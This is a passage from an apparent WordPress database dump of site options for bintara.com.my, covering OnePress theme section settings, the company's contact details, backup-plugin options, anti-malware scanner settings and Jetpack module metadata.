\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:1;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:7:\"Clients\";s:10:\"section_id\";s:7:\"clients\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:2;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:8:\"Features\";s:10:\"section_id\";s:8:\"features\";s:12:\"show_section\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:3;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:5:\"About\";s:10:\"section_id\";s:5:\"about\";s:12:\"show_section\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:4;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:8:\"Services\";s:10:\"section_id\";s:8:\"services\";s:12:\"show_section\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:5;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:13:\"Videolightbox\";s:10:\"section_id\";s:13:\"videolightbox\";s:12:\"show_section\";i:1;s:15:\"section_inverse\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:73:\"https://bintara.com.my/wp-content/themes/onepress/assets/images/hero5.jpg\";s:2:\"id\";s:0:\"\";}s:15:\"enable_parallax\";i:1;s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:6;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:7:\"Gallery\";s:10:\"section_id\";s:7:\"gallery\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:7;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:8:\"Projects\";s:10:\"section_id\";s:8:\"projects\";s:12:\"show_section\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:8;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:7:\"Counter\";s:10:\"section_id\";s:7:\"counter\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:9;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:12:\"Testimonials\";s:10:\"section_id\";s:12:\"testimonials\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:10;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:7:\"Pricing\";s:10:\"section_id\";s:7:\"pricing\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:11;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:14:\"Call to Action\";s:10:\"section_id\";s:3:\"cta\";s:15:\"section_inverse\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:12;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:4:\"Team\";s:10:\"section_id\";s:4:\"team\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:13;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:4:\"News\";s:10:\"section_id\";s:4:\"news\";s:12:\"show_section\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:14;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:7:\"Contact\";s:10:\"section_id\";s:7:\"contact\";s:12:\"show_section\";i:1;s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}i:15;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:3:\"Map\";s:10:\"section_id\";s:3:\"map\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"bg_video\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"bg_video_webm\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"bg_video_ogv\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:16:\"bg_opacity_color\";s:0:\"\";s:11:\"padding_top\";s:0:\"\";s:14:\"padding_bottom\";s:0:\"\";s:12:\"show_section\";s:0:\"\";s:15:\"section_inverse\";s:0:\"\";s:20:\"section_page_content\";s:0:\"\";s:10:\"hide_title\";s:0:\"\";s:4:\"desc\";s:0:\"\";s:7:\"content\";s:0:\"\";s:15:\"enable_parallax\";s:0:\"\";s:9:\"fullwidth\";s:0:\"\";}}s:19:\"onepress_contact_id\";s:7:\"Contact\";s:22:\"onepress_contact_title\";s:12:\"Get in touch\";s:25:\"onepress_contact_subtitle\";s:0:\"\";s:20:\"onepress_contact_cf7\";s:12:\"[vfb id=\"1\"]\";s:20:\"onepress_about_boxes\";a:1:{i:0;a:3:{s:12:\"content_page\";s:4:\"1287\";s:10:\"hide_title\";i:1;s:11:\"enable_link\";s:0:\"\";}}s:23:\"onepress_about_subtitle\";s:0:\"\";s:19:\"onepress_about_desc\";s:23:\"<br data-mce-bogus=\"1\">\";s:21:\"onepress_about_layout\";s:1:\"1\";s:23:\"onepress_projects_title\";s:8:\"PRODUCTS\";s:26:\"onepress_projects_subtitle\";s:22:\"Our Products Portfolio\";s:24:\"onepress_projects_layout\";s:1:\"4\";s:21:\"onepress_project_ajax\";i:1;s:24:\"onepress_projects_number\";s:2:\"84\";s:20:\"onepress_projects_id\";s:8:\"Products\";s:20:\"onepress_about_title\";s:5:\"About\";s:17:\"onepress_about_id\";s:5:\"About\";s:28:\"onepress_contact_cf7_disable\";i:0;s:21:\"onepress_contact_desc\";s:0:\"\";s:21:\"onepress_contact_text\";s:266:\"<strong>Bintara Solutions Sdn. Bhd. </strong>\n27-3, Jalan Setiawangsa 9,\nTaman Setiawangsa,\n54200 Kuala Lumpur,\nWilayah Persekutuan Kuala Lumpur.\n\n<strong>Tel :</strong> 03-4266 3311\n<strong>Fax :</strong> 03-4251 1000\n<strong>Email :</strong>  info@bintara.com.my\n\n\";s:19:\"onepress_news_title\";s:13:\"NEWS & EVENTS\";s:22:\"onepress_news_subtitle\";s:0:\"\";s:16:\"onepress_news_id\";s:4:\"News\";s:20:\"onepress_services_id\";s:8:\"Services\";s:23:\"onepress_services_title\";s:8:\"Services\";s:26:\"onepress_services_subtitle\";s:0:\"\";s:23:\"onepress_service_layout\";s:1:\"4\";s:16:\"onepress_map_lat\";s:8:\"3.178566\";s:17:\"onepress_map_long\";s:10:\"101.741528\";s:20:\"onepress_map_address\";s:44:\"<strong>Bintara Solutions Sdn. Bhd.</strong>\";s:21:\"onepress_project_slug\";s:0:\"\";s:25:\"onepress_projects_orderby\";s:5:\"title\";s:23:\"onepress_projects_order\";s:3:\"ASC\";s:26:\"onepress_testimonial_boxes\";a:1:{i:0;a:7:{s:5:\"title\";s:12:\"Cras iaculis\";s:4:\"name\";s:13:\"Alexander Max\";s:5:\"image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:8:\"subtitle\";s:17:\"Founder &amp; CEO\";s:7:\"content\";s:84:\"Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue eu vulputate.\";s:5:\"style\";s:7:\"success\";s:12:\"custom_color\";s:0:\"\";}}s:22:\"onepress_services_desc\";s:193:\"BINTARA offers a comprehensive range of services and solutions. BINTARA works with over 70 suppliers, and weâ€™re certified with partners including Microsoft, Dell EMC, Lenovo, Logitech and HP.\";s:17:\"onepress_services\";a:3:{i:0;a:5:{s:9:\"icon_type\";s:4:\"icon\";s:4:\"icon\";s:0:\"\";s:5:\"image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"content_page\";s:4:\"1356\";s:11:\"enable_link\";s:0:\"\";}i:1;a:5:{s:9:\"icon_type\";s:4:\"icon\";s:4:\"icon\";s:0:\"\";s:5:\"image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"content_page\";s:4:\"1352\";s:11:\"enable_link\";s:0:\"\";}i:2;a:5:{s:9:\"icon_type\";s:4:\"icon\";s:4:\"icon\";s:0:\"\";s:5:\"image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:12:\"content_page\";s:4:\"1362\";s:11:\"enable_link\";s:0:\"\";}}s:31:\"onepress_service_content_source\";s:7:\"excerpt\";s:27:\"onepress_newsletter_disable\";i:0;s:23:\"onepress_hcl1_btn1_text\";s:8:\"Services\";s:23:\"onepress_hcl1_btn1_link\";s:32:\"https://bintara.com.my/#Services\";s:23:\"onepress_hcl1_btn2_link\";s:32:\"https://bintara.com.my/#Products\";s:23:\"onepress_news_hide_meta\";s:1:\"1\";s:26:\"onepress_news_excerpt_type\";s:6:\"custom\";s:20:\"onepress_news_number\";s:1:\"3\";s:17:\"onepress_news_cat\";s:1:\"0\";s:26:\"onepress_animation_disable\";i:1;}','yes'),(140,'current_theme','OnePress','yes'),(141,'theme_switched','','yes'),(142,'theme_switched_via_customizer','','yes'),(143,'customize_stashed_theme_mods','a:0:{}','no'),(158,'wpforms_preview_page','13','yes'),(150,'onepress_sections_settings','a:17:{s:4:\"hero\";i:1;s:6:\"slider\";i:1;s:7:\"clients\";i:1;s:8:\"features\";i:1;s:5:\"about\";i:1;s:8:\"services\";i:1;s:13:\"videolightbox\";i:1;s:7:\"gallery\";i:1;s:8:\"projects\";i:1;s:7:\"counter\";i:1;s:12:\"testimonials\";i:1;s:7:\"pricing\";i:1;s:3:\"cta\";i:1;s:4:\"team\";i:1;s:4:\"news\";i:1;s:7:\"contact\";i:1;s:3:\"map\";i:1;}','yes'),(4868,'updraft_retain_extrarules','a:0:{}','yes'),(4869,'updraft_email','','yes'),(4870,'updraft_report_warningsonly','a:0:{}','yes'),(4871,'updraft_report_wholebackup','a:0:{}','yes'),(4872,'updraft_extradbs','a:0:{}','yes'),(4873,'updraft_include_more_path','a:0:{}','yes'),(4874,'updraft_interval','daily','yes'),(4875,'updraft_retain','1','yes'),(4878,'updraft_interval_database','daily','yes'),(4879,'updraft_retain_db','1','yes'),(4891,'updraft_ssl_useservercerts','0','yes'),(4892,'updraft_ssl_disableverify','0','yes'),(4893,'updraft_ssl_nossl','0','yes'),(4894,'updraft_auto_updates','0','yes'),(60985,'_transient_timeout_feed_mod_d21d2a68bac70d38fb7f9a7bd3d1725e','1574176366','no'),(60986,'_transient_feed_mod_d21d2a68bac70d38fb7f9a7bd3d1725e','1573571566','no'),(48502,'GOTMLS_settings_array','a:9:{s:12:\"msg_position\";a:4:{i:0;s:4:\"80px\";i:1;s:4:\"40px\";i:2;s:5:\"400px\";i:3;s:5:\"600px\";}s:9:\"scan_what\";i:2;s:10:\"scan_depth\";i:-1;s:11:\"exclude_ext\";a:27:{i:0;s:3:\"png\";i:1;s:3:\"jpg\";i:2;s:4:\"jpeg\";i:3;s:3:\"gif\";i:4;s:3:\"bmp\";i:5;s:3:\"tif\";i:6;s:4:\"tiff\";i:7;s:3:\"psd\";i:8;s:3:\"svg\";i:9;s:3:\"doc\";i:10;s:4:\"docx\";i:11;s:3:\"ttf\";i:12;s:3:\"fla\";i:13;s:3:\"flv\";i:14;s:3:\"mov\";i:15;s:3:\"mp3\";i:16;s:3:\"pdf\";i:17;s:3:\"css\";i:18;s:3:\"pot\";i:19;s:2:\"po\";i:20;s:2:\"mo\";i:21;s:2:\"so\";i:22;s:3:\"exe\";i:23;s:3:\"zip\";i:24;s:2:\"7z\";i:25;s:2:\"gz\";i:26;s:3:\"rar\";}s:12:\"check_custom\";s:0:\"\";s:11:\"exclude_dir\";a:0:{}s:8:\"user_can\";s:14:\"manage_network\";s:10:\"scan_level\";i:3;s:5:\"check\";a:6:{s:19:\"Database Injections\";s:7:\"db_scan\";s:16:\"htaccess Threats\";s:8:\"htaccess\";s:17:\"TimThumb Exploits\";s:8:\"timthumb\";s:13:\"Known Threats\";s:5:\"known\";s:17:\"Core File Changes\";s:7:\"wp_core\";s:17:\"Potential Threats\";s:9:\"potential\";}}','yes'),(48503,'GOTMLS_nonce_blob','YToxOntzOjMyOiJhZTk4ZThlNzE2YTJhYjU=YzQ5MjVmZGQwZThkNWQ2MCI7ZDo=MzU4NTY7fQ3','yes'),(56294,'_transient_timeout_jetpack_file_data_7.8','1574493278','no'),(56295,'_transient_jetpack_file_data_7.8','a:51:{s:32:\"212a162108f1dc20cc6c768d5b47d4f2\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"d3576702faeb399eb47ad20f586c3804\";a:14:{s:4:\"name\";s:8:\"Carousel\";s:11:\"description\";s:75:\"Display images and galleries in a gorgeous, full-screen browsing experience\";s:4:\"sort\";s:2:\"22\";s:20:\"recommendation_order\";s:2:\"12\";s:10:\"introduced\";s:3:\"1.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:80:\"gallery, carousel, diaporama, slideshow, images, lightbox, exif, metadata, image\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"55409a5f8388b8d33e2350ef80de3ea3\";a:14:{s:4:\"name\";s:13:\"Comment Likes\";s:11:\"description\";s:64:\"Increase visitor engagement by adding a Like button to comments.\";s:4:\"sort\";s:2:\"39\";s:20:\"recommendation_order\";s:2:\"17\";s:10:\"introduced\";s:3:\"5.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:37:\"like widget, like button, like, likes\";s:12:\"plan_classes\";s:0:\"\";}s:32:\"e914e6d31cb61f5a9ef86e1b9573430e\";a:14:{s:4:\"name\";s:8:\"Comments\";s:11:\"description\";s:81:\"Let visitors use a WordPress.com, Twitter, Facebook, or Google account to comment\";s:4:\"sort\";s:2:\"20\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:53:\"comments, comment, facebook, twitter, google+, 